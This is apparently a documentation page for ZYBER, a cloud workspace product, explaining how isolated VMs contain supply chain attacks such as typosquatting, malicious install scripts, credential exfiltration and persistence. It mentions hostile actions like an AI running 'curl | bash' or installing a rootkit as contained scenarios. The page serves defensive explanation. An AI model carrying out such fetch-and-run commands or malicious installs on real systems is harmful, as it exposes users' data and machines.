Dependency Safety

How ZYBER protects against malicious packages and supply chain attacks.

The Threat

Modern development relies on thousands of dependencies. Any one could be compromised:

Attack Vector

Real-World Examples

Typosquatting

colourama instead of colorama

Account hijacking

event-stream npm incident

Malicious updates

ua-parser-js compromised release

Dependency confusion

Private package name collision

Install scripts

Arbitrary code execution on npm install

Why ZYBER Helps

When you run npm install or pip install:

Traditional Setup

ZYBER

Runs on your machine

Runs in isolated VM

Access to your files

Access to workspace only

Access to your credentials

No access to your device

Persistent malware possible

Terminated with workspace

Network access to your LAN

No access to your network

Attack Containment

Install Script Execution

Package managers execute arbitrary code during installation:

npm install → runs preinstall/postinstall scripts
pip install → runs setup.py

In ZYBER, these scripts run inside the workspace:

┌─────────────────────────────────────────────────────┐
│                   Your Device                        │
│  ┌───────────────────────────────────────────────┐  │
│  │  Safe - no code execution here                │  │
│  └───────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────┘
                         │
                         │ View only
                         ▼
┌─────────────────────────────────────────────────────┐
│                 ZYBER Workspace                      │
│  ┌───────────────────────────────────────────────┐  │
│  │  npm install malicious-package                │  │
│  │       │                                       │  │
│  │       ▼                                       │  │
│  │  postinstall script runs here                 │  │
│  │  - Can access workspace files ✓              │  │
│  │  - Cannot access your device ✗               │  │
│  │  - Cannot access your network ✗              │  │
│  │  - Cannot persist after termination ✗        │  │
│  └───────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────┘

Data Exfiltration Limits

Even if a malicious package runs, it can only exfiltrate:

Data

Accessible

Workspace files

✅ Yes (but not your real files)

API keys in workspace

✅ Yes (use ephemeral sessions for sensitive keys)

Your local files

❌ No

Your browser cookies

❌ No

Your SSH keys (local)

❌ No

Your password manager

❌ No

Persistence Prevention

Malware persistence techniques don't work:

Technique

Effectiveness

Cron jobs

❌ Workspace terminated

Systemd services

❌ Workspace terminated

Shell profile modification

❌ Ephemeral: gone on termination

Binary replacement

❌ Workspace terminated

Kernel modules

❌ No kernel access

Package Registry Security

Registry Connections

Registry

Connection

npm (registry.npmjs.org)

HTTPS, verified

PyPI (pypi.org)

HTTPS, verified

crates.io

HTTPS, verified

apt repositories

HTTPS, GPG verified

Checksum Verification

Package managers verify integrity:

# npm uses SHA-512 in package-lock.json
# pip uses SHA-256 hashes
# cargo uses SHA-256 in Cargo.lock

ZYBER doesn't modify packages, so standard verification works normally.

Recommended Practices

Use Lockfiles

Always commit lockfiles to pin exact versions:

Package Manager

Lockfile

npm

package-lock.json

yarn

yarn.lock

pip

requirements.txt with hashes

cargo

Cargo.lock

Audit Before Install

# npm
npm audit

# pip
pip-audit

# cargo
cargo audit

Use Ephemeral Sessions for Untrusted Code

When evaluating unknown packages:

Create ephemeral workspace
Install and test package
Terminate workspace

If malicious, nothing persists.

Minimal Permissions in Workspace

Even within workspace:

# Run untrusted code as non-root user
su - limiteduser -c "npm install sketchy-package"

AI Agent Safety

When AI agents suggest installing packages:

Scenario

Protection

AI suggests malicious package

Runs in workspace, not your device

AI runs curl | bash

Executes in workspace only

AI modifies system files

Workspace system, not yours

AI installs rootkit

Terminated with workspace

This is why ZYBER exists, so AI agents can experiment freely without risking your actual system.

Limitations

ZYBER protects your device, but cannot prevent:

Risk

Mitigation

Malicious code accessing workspace data

Use ephemeral sessions for sensitive work

Exfiltration of API keys stored in workspace

Rotate keys, use short-lived tokens

Cryptocurrency mining in workspace

Resource limits, billing visibility

Workspace being used for attacks

Network rate limiting, abuse detection

PreviousNetwork Controls NextBenchmarks

Last updated 1 month ago

Good morning

hashtagThe Threat

hashtagWhy ZYBER Helps

hashtagAttack Containment

hashtagInstall Script Execution

hashtagData Exfiltration Limits

hashtagPersistence Prevention

hashtagPackage Registry Security

hashtagRegistry Connections

hashtagChecksum Verification

hashtagRecommended Practices

hashtagUse Lockfiles

hashtagAudit Before Install

hashtagUse Ephemeral Sessions for Untrusted Code

hashtagMinimal Permissions in Workspace

hashtagAI Agent Safety

hashtagLimitations

The Threat

Why ZYBER Helps

Attack Containment

Install Script Execution

Data Exfiltration Limits

Persistence Prevention

Package Registry Security

Registry Connections

Checksum Verification

Recommended Practices

Use Lockfiles

Audit Before Install

Use Ephemeral Sessions for Untrusted Code

Minimal Permissions in Workspace

AI Agent Safety

Limitations